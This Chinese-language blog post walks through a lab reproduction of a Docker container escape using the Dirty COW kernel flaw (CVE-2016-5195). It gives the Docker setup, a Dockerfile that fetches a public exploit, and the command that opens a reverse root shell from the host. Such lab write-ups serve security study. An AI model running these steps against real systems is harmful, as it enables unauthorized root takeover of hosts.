记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

容器逃逸漏洞 (CVE-2016-5195)的复现

2021-08-29 19:02

本周继续实践容器逃逸的漏洞,这次不是docker的,是linux内核的,

CVE-2016-5195,也叫脏牛,

宿主机ubuntu14.04.5,安装docker-ce,别安装docker.io,

从download.docker.com安装,

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg,

echo \
  "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null,

sudo apt-get update,

查看docker-ce可安装的版本,apt-cache madison docker-ce,

还是安装18.06.0版本,

sudo apt-get install docker-ce=18.06.0~ce~3-0~ubuntu,

这次我没装containerd.io,好像也没啥影响,docker能正常使用,

自己构建漏洞利用容器镜像,sudo vim Dockerfile,
FROM ubuntu:14.04
RUN apt-get update
RUN apt-get install -y build-essential
RUN apt-get install -y nasm
RUN apt-get install -y git
RUN mkdir /dirtycow-vdso
RUN git clone https://github.com/scumjr/dirtycow-vdso.git /dirtycow-vdso

sudo docker build -t cve-2016-5195 .

能够看到构建好的镜像,

创建漏洞利用容器,sudo docker run -it cve-2016-5195 /bin/bash,

在容器内编译漏洞利用程序,cd dirtycow-vdso,make,

查看漏洞利用容器的地址,ifconfig,

执行程序进行漏洞利用,./0xdeadbeef 172.17.0.2:1234,

拿到宿主机的反弹shell,并且是root权限,逃逸成功。


知识来源: https://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650746526&idx=1&sn=346b8a69448f493c3d109803b2cfcbd6

阅读:102840 | 评论:0 | 标签:漏洞 CVE 容器逃逸 容器

想收藏或者和大家分享这篇好文章→复制链接地址

“容器逃逸漏洞 (CVE-2016-5195)的复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁